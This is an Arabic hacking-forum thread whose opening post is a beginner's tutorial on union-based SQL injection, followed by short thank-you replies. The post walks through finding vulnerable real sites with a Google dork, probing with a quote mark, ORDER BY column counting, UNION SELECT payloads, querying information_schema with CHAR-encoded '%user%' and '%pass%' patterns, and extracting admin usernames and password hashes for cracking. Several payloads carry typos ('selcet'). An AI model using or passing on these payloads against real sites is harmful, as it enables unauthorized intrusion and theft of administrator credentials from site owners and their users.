 |
 |
 |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
 |
 |
 |
||||||||
|
||||||||||
 |
 |
 |
||||||||
| [ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك , |
 |
|
|
أدوات الموضوع | انواع عرض الموضوع |
17/09/2010, 10:18
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 1
تم شكره 34 مرة في 20 مشاركة
|
بسـم اللـه الرحمـن الـرحيـم امـا بعـد اليـوم حـبيـت انـزل للاعضاء الكرام درس خفيـف وبنفس الوقـت معـروف عنـد اكثرنـا بس يجهلـه المـبـتـدأيـن. طبعـا اليـوم راح اتكلـم عـن مبـادئ واسـاسيـات SQL وكمـا تسمـى حقـن قواعد البيانات وطبعـا زي ما تشوفون جميع مواقع السيكورتي كلهـا مليـانـه مـن هالثغـرات ... و على بركة الله نبدا الدرس: اول شي ... راح تقول كيف راح اعرف المواقع المصابة: راح اقولك: خذ هذا الدورك وضعه في محرك البحث قوقل: inurl:index.php?id= ليس من الضروري ها الدروك توجد الكثر منها وواضعه الاخ : S-japonia33 اوك الان انت قمت باستخراج جميع المواقع المصابة بالثغرة اللي بحثت بيها انت راح تستغرب انت وراح يجيك اكثر من 100 موقع مصاب .  ثاني شي... راح تقولي يا حمزة كيف راح اعرف انو الموقع مصاب؟؟؟ انا راح اقولك كيف: مثلا انت اخترت موقع و رابط الموقع راح يكون كالتالي: dz-sec team.com/index.php?id=10 نـرى ان امـتـداد الصفحـه php وبعـدهـ id وطبعـا id هـو متغيـر يعني مو شـرط انـه يكـون id في مثلا CID وفي xor ... الخ على حسب السكربت و ليس من الضروري انك تلقى الرقم 10 ممكن تلقى اي رقم. و طبعا للتاكد من انو الموقع مصاب بثغرة ام لا نضيـف لـه قيمـه مجـهـولـه مثـلا ( ' ) نضيفهـا بعـد الـرابــط ومثـالنـا فوق يعني نضيـف هالقيمـه بعـد الرقـم [10] طبعـا اذا هو مصـااب ستلاحـظ تظهـر لـك في وسـط الصفحـه مثـلآ : Warning: mysql_fetch_array & Warning: mysql_result & Warning: preg_match & Warning: mysql_result وطبعـا ليسـت محصـورهـ على هذه في بعـض الاحيـاان تظهـر على اشكـال مختلفـه ومتعـددة . يعنـي مـن الاخيــرر : عنـدمـا تلاحـظ اي تغيـر بالصفحـه فـهـو احتمـال انـه هالموقع مصـاب بثغـرة. طبعـا الآن لـنفرض ظهـر لـنـا خطـاء ننـتـقـل الى الخـطوة الثــاانيـه والمعـروفــه ( يوجد البعض لا يعرفها): نضـع بعـد الرابـط مـبـاشـرة [ +order+by ] ونضـيـف بعـدهـ اي رقـم كبيـر 150 & 100 اي رقـم لكن حتـى نحـدد العـمـود المصـااب يعنـي نطبـق على مثالنـا اللي فوق: dz-sec team.com/index.php?id=10+order+by+100 ملاحظة هامة جدا: لاتنسى ان تضـع الاشـارة ( */ ) او ( * ) او (--) بعـد الرقـم 150 وطبعـا هي على حسب الموقـع بعض المواقـع تضع هذه العـلآمـات وبعضهـا لا تستخدمهـا .. طبعـا نجـرب الثلاث حنـا حـتـى يـزول الخطـااء طبعـا راح تظهـر لـك رسالـه الخطـااء في منتصف الصفحـه */* انـت عليـك بتقليـص العـدد [100 ] حتى يزول الخطـااء مـن منتصف الصفحـه فـل نفـرض مثـال : dz-sec team.com/index.php?id=10+order+by+12 اهاا زال الخـطـاء عنـد رقـم 12 . الآن ننــتـقـل الى الخـطوة الـثـالثـه : نقـوم بمـسـح +order+by+12 وطبعـا قلنـا ان الخطـاء زال عنـد الرقـم 12 نضيـف بعـد الرابـــط +union+selcet مثـلا على الموقـع : dz-sec team.com/index.php?id=10+union+select+union+selcet+1,2,3,4, 5,6,7,8,9,10, 11,12 وبعـدهـا سـتـشااهــد ان العمـود ظهـر لـك في منـتـصف الصفحـه طبعـا اللي ماظهـر لـه العمـود في ثلاثـة احتمـالات ضـع قبـل الامـر [union+selcet] في الرابـط ضـع قبلهـا وااحـد مـن الثلاث الاحتـمـاالآت التـالية: and+1=0 او and+1=1 او and+1=2 يعني مثلا: dz-sec team.com/index.php?id=10+and+1=2+union+selcet و تكمل مثل ماقلنا فووق. نرجـع لـ خطواتنـا نفترض انـه طلـع العمـود المصـاب هـو رقـم ( 4 ) ننـتـقـل الى الخطـوة الرابعـة : اللـينريده الان نعـرف اصـدار اليـوزر والقـاااعـدة مثـل ماقلنـا انـه الرقـم اللي مثلا ظهر لنـا في مـنـتـصف الصفحـه هـو : الرقـم ( 4 ) طبعـا اللحيـن نـروح لـ الرقم ونمسحـه ونعـوض مكـانـه بـ version() او user() او database() نرجـع نبطق على مثـالنـا اللي هو الفريق اليووم ههه: dz-sec team.com/index.php?id=10+union+selcet+1,2,3,version(),5,6,7 ,8,9,10,11,12 هذا الامر يطلع لنا اصدار القاعدة. و للتقليل من التعب جمعنا جميع الاوامر في امر واحد وهو التالي: concat(user(),0x3a,version(),0x3a,database()) طبعا نضع الامر مكان العمود المصاب (4). الامـر هذا يطلـع لنـا يـوزر واسـم واصدار القـاعـدة راح يطلـع لنـا في الصفحـه اللحيــن اصدر القااعـدهـ يـ انـه يكـون اربعـه او خمسـه ملاحظـه : اللي مايظهـر معـه في وسـط الصفحـه .. ارجـع ابحث مرة ثاانيـه في اعلى الصفحـه او في المـصـدر . اللـحيـن اللي ظهــر معـه اصـدار القـاعدة ( 4 ) ومعـروف انـه تخمين وشويـة وجـع رآس بس مـع الايـام تتعـود عليهـاا ونقولو اصبر للغد انشاء الله و انزل شرح فيديو لطريقة التعامل مع الاصدار الرابع. اما الاصدار الخامس فهو بدون تخمين ولا وجع راس. نرجع لموضوعنا: اول مـا تشوف اصـدار القـااعـده خمسـة على طول تروح وتضـع في اخر الرابـط : concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema) مكـان العمـود المصـاب اللي افترضنـا انـه الرقـم ( 4 ) والامـر الثــااني : +from+information_schema.columns+where+column_name +like+char(الامـر المراد تشفيرة) بعـا الامر مراد تشفيرة يكون بـ اخر الرابط لاكـن الكتـابـه بالعربي وضعتـه كانـه في اول الرابـط وطبعـا نعلـق على كلمـه الامر المراد تشفيرهـ طبعـا او شي لازم اشـرح لـكم الامر الاول والثــااني حتى تفهـم ما اذا اقصد في الامـر مراد تشفيره . الامـر الاول : concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema) concat: هذا يدمج الاشياء الي بعدو وهي table_name يعني اسم الجدول column_name يعني اسم العمود table_schema يعني نواة القاعدة الامـر الثـانـي : +from+information_schema.columns+where+column_name +like+char(الامـر المراد تشفيرة) الان نفوت للامر الثاني from يعني بالعربي (من) وهي مربوطة بالامر الي قبلها select والي هو استخراج المقصود: و استخراج الاشياء المدموجة من information_schema.columns والي هي النواة where يعني بالعربي ( بحيث ) . يعني مثل مـا نقـول لـ القـاعدهـ بلغتنـا العـامـه جيبلي الاشياء المشـابـه باللي راح نضعهـا في خانـه الامر المراد تشفيـرة مثـلا الباسبورد اليوزر نشفـر ونحطـه في خاانـه ( الامر المراد تشفيره ) الامرين الذين نشفرهما %pass% و%use% تشفيـر mysql char طبعـا نشفـر الامـر %pass% & %use% ونضعـه في الخـاانــه لـ كي يكون الامــر بـ هذا الشكــل : php?id=10+union+selcet+1,2,3,concat(table_name,0x3 a3a,column_name,0x3a3a,table_schema),5,6,7,8,9,10, 11,12+from+information_schema.columns+where+column _name+LIKE+char(37, 117, 115, 101, 37) شـرح لـ اللي كتبت فوق ... concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema) هذا نضعـه مكـان العمـود المصـاب وشرحناه فوق +from+information_schema.columns+where+column_name +LIKE+char(37, 117, 115, 101, 37) هذا اخر الرابـط وسبق شرحـه فووق 37, 117, 115, 101, 37 هذ1 تشفيـر لـ كلمـه %use% وشفـرنـاه بـ اداة HackBar تشفير mysql char بعـد ذلـك راح يظهـر لنـا ثلاثـة اشيـاء مدموجـة مثـال كـ توضيـح : CCC:::BBB::: AAA وطبعـا يفـصل بينهـم بـ ( :: ) وهـي اسمـاء الاعمـدهـ والجـدوال وطبعـا هدفنـا هو استـخراج المعلومات دااخل هذة الاعمـدة والـجـدوال طبعـا اللحيـن طريقـة استخراج هذة المعلومـات . طبعـا هدفنـا اللحيـن نطلـع المعلومـات اللي في العمـود هذا [AAAA] ويكـون بالطريقــه التـااليــه : ( ليس شرط ان يظهر هذا AAAA] هو اسم العمود ولكن للتوضيح فقط. نكمل الان: نضـع اللي ظهـر لنـا مكـان [ BBB ] في خانـه العمـود المصـااب ثـم نضـع ما ظهـر لنـا مكـان [ AAA ] بعـد كلمـه from ثم نضـع نقطـه ( . ) ثـم نضـع مـاظهـر لـنـا مكـان [ CCC ] في اخر الرابـط ونضغـط انتـر يعني مثـلآ : dz-sec team.com/index.php?id=10+union+selcet+1,2,3,BBB,5,6,7,8,9,1 0,11,12+from+AAA.CCC وطبعـا لا ننسى في اخر الرابـط علامـات [-- ] او [*/] او[*] على حسب الموقـع . راح يظهـر لـك الآن اسـم اليـوزر الادمـن . Admin اللحيــن عرفنـا اسـم اليـوزر بـاقي الـبـااس نفس طريقـة اخراج اليوزر نقوم بـ اخراج البـااس بالطريقـه التـاليــه : dz-sec team.com/index.php?id=10+union+selcet+1,2,3,concat(table_na me,0x3 a3a,column_name,0x3a3a,table_schema),5,6,7,8,9,10, 11,12+from+information_schema.columns+where+column _name+LIKE+char(37, 112, 97, 115, 115, 37) (37, 112, 97, 115, 115, 37) لاحـظ هنـا قمنـا بتغيـيـر الكلمـه المراد البحث عنهـا وشفرنـاهـا طبعـا الكلمـه هي %pass% يعني طلبنـا البحث عـن هذه الكلمـه راح يظهـر لنـا الآن نفس في الصفحــه AAA::::HHHH:::::RRRR AAA::::HHHH:::::RRRR طبعـا ما تحتـاج شـرح نفس الطريقـه الاولى HHHH نضعهـا في مكـان العمـود المصــااب RRRR نضعـهـا بعـك كلمـه from ثـم نقطـه ( . ) ثـم AAA راح يطلـع لـك الهـاش تاع الـبـآس وطبعـا هنـا ما تحتـااج ماشاء اللـه في المنتـدى واضعين الكثير من مواقع فك الهاش لا تعـد ولا تحصى . و ممكن في بعض الاحيان يطلعلك الباس مو مشفر. وهنا نصل الى ختام موضوعنا وارجو ان اكون قد وفقت في شرحي هذا. و الشرح اهداء الى: الاخ (yasMOUH) حبيب قلبي مدمن هكر. و الغالي ابا معاذ. و لا ننسى الغالي: [] و الاخ الكريم: [] و الاخ الكريم: Black-ID و الى جميع الاعضاء الغاليين على قلبي. و جمعة مباركة على الجميع.
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| الأعضاء الذين قالوا شكراً لـ Ev!LScR!pT_Dz على المشاركة المفيدة: |
xdvb (07/02/2011)
|
|
17/09/2010, 10:21
|
المشاركة رقم: 2 | ||||||||||||
|
ابداع في ابداع |
||||||||||||
|
|
|
||||||||||||
|
17/09/2010, 14:33
|
المشاركة رقم: 3 | ||||||||||||
|
ياخويا حمزة يعني عبك غير هذاك الدومين تشرح عليه |
||||||||||||
|
|
|
||||||||||||
|
17/09/2010, 18:20
|
المشاركة رقم: 4 | ||||||||||||
|
بارك الله فيك اخي حمزه |
||||||||||||
|
|
|
||||||||||||
|
17/09/2010, 23:15
|
المشاركة رقم: 5 | ||||||||||||
|
بوركت ياحمزة على هذا المجهود الرائع |
||||||||||||
|
|
|
||||||||||||
|
25/09/2010, 10:45
|
المشاركة رقم: 6 | ||||||||||||
|
**** على الشرح الوافي و الكافي |
||||||||||||
|
|
|
||||||||||||
|
11/12/2010, 10:46
|
المشاركة رقم: 7 | ||||||||||||
|
**** على الشرح الرائع |
||||||||||||
|
|
|
||||||||||||
|
13/12/2010, 22:40
|
المشاركة رقم: 8 | ||||||||||||
|
بارك الله فيك و الله شرح مفصل |
||||||||||||
|
|
|
||||||||||||
|
06/02/2011, 21:20
|
المشاركة رقم: 9 | ||||||||||||
|
بارك الله فيك حبيبنا |
||||||||||||
|
|
|
||||||||||||
|
29/05/2011, 17:02
|
المشاركة رقم: 10 | ||||||||||||
|
تسلم ايدك علي الشرح الكامل والوافي |
||||||||||||
|
|
|
||||||||||||
|
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| غرفة الحقن sql | BlackHunter.Dz | [ منتدى حـقن قواعد البيانات | Sql injcetion ] | 222 | 28/07/2015 17:12 |
| جميــع ادوات الحقن SQL Injection | ViRuS_Ra3cH | [ منتدى الأدوات Hacking Tools ] | 33 | 10/07/2015 05:44 |
| برنامج الكودر لتشفير الحقن وتخطي الفلتره ... | ViRuS_Ra3cH | [ منتدى الأدوات Hacking Tools ] | 6 | 08/06/2015 10:05 |
| دورة BlaCk Dr3aM لاحتراف الحقن من الالف الى الياء | ViRuS_Ra3cH | [ الدورات العامة ] | 5 | 25/09/2013 18:37 |
| شرح لبعض الادوات التي استعملتها من قبل في الحقن ~ للمبتدئين | S-japonia33 | [ منتدى حـقن قواعد البيانات | Sql injcetion ] | 10 | 29/05/2011 18:24 |
 |
 |
 |
**ادخل واحترف الحقن**
العرض العادي
